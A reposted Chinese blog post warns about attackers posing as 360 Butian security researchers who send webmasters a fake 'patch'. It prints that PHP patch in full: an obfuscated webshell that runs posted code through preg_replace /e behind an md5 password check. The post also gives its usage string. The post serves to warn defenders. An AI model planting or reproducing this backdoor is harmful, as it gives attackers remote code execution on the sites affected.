如何利用钓鱼黑吃黑

0x00 前言

15年10月写的文章，今天无意翻到了，就刚好贴在博客吧。

博客也很久没更新了。

0x01 钓鱼模式

0x02 神奇补丁程序

这是所谓的安全工程师发给网管的安全代码。

1000000){  die('404');}if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"])){  $__PHP_debug   = array (    'ZendName' => '70,61,73,73',     'ZendPort' => '63,68,65,63,6b',    'ZendSalt' => '202cb962ac59075b964b07152d234b70'  //792e19812fafd57c7ac150af768d95ce  );   $__PHP_replace = array (    pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),    pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),    $__PHP_debug['ZendSalt']  );  $__PHP_request = &$_POST;  $__PHP_token   = md5($__PHP_request[$__PHP_replace[0]]);   if ($__PHP_token == $__PHP_replace[2])  {    $__PHP_token = preg_replace (      chr(47).$__PHP_token.chr(47).chr(101),      $__PHP_request[$__PHP_replace[1]],      $__PHP_token    );     unset (      $__PHP_debug,      $__PHP_replace,      $__PHP_request,      $__PHP_token    );     if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!');   }}

代码我已经将792e19812fafd57c7ac150af768d95ce这个md5换成了123的md5 202cb962ac59075b964b07152d234b70

这个代码一看，如果之前没接触过类似的代码，应该会有很多人会认为：这个代码搞啥玩儿，php内核？

乍眼看，应该没什么后门

百度搜索一下792e19812fafd57c7ac150af768d95ce，看快照，可以发现

最后解密出来其实是利用preg_replace的/e来执行的一句话webshell。

利用方式：pass=123&check=phpinfo();

钓鱼的代码还有以下几种：

有的黑客将后门代码放在 扫描木马后门 的程序里。特别的猥琐

0x03 具体钓鱼

下面是一个黑客钓鱼的真实场景。先看下黑阔的背景身份。

1. 伪装安全工程师

个人主页： http://loudong.360.cn/vul/profile/uid/2822960/

伪装成360补天的一名白帽子，并且把自己QQ地址写成360公司的地址

但是黑客却以为补天的白帽子就是360的员工

不过站长也确实信了他360的身份。因为改的备注是 360安全小组

1. 强调补丁的强大

用了补丁代码，*地址立马404。还用chattr +i 设置文件为read only

0x04 总结

安全，从我做起